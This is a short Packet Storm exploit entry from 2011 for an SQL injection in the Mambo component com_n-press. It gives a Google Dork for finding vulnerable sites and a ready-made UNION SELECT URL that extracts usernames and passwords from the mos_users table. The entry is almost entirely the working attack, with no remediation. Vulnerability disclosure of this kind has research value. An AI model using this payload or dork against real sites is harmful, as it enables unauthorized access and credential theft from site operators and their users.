Mambo N-Press SQL Injection

2011-09-01T00:00:00
ID PACKETSTORM:104705
Type packetstorm
Reporter CoBRa_21
Modified 2011-09-01T00:00:00

Description

                                        
                                            `  
------------------------------------------------------------------------------------------------------  
# Exploit Title: Mambo Component com_n-press SQL Injection Vulnerability  
# Google Dork: inurl:index.php?option=com_n-press  
# Date: 01/09/2011  
# Author: CoBRa_21 (Penetration Tester)  
# E-Mail: ghost1lover@hotmail.com   
# Software Link: http://www.netvistun.is/  
# Tested on: FreeBSD 6.1 (remote host)  
------------------------------------------------------------------------------------------------------  
  
Exploit  
  
http://localhost/[PATH]/index.php?option=com_n-press&press=10 union select 0,username,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mos_users  
  
------------------------------------------------------------------------------------------------------  
  
Thanks E-Banka.Org & Cyber-Warrior.Org  
  
------------------------------------------------------------------------------------------------------  
  
  
  
  
`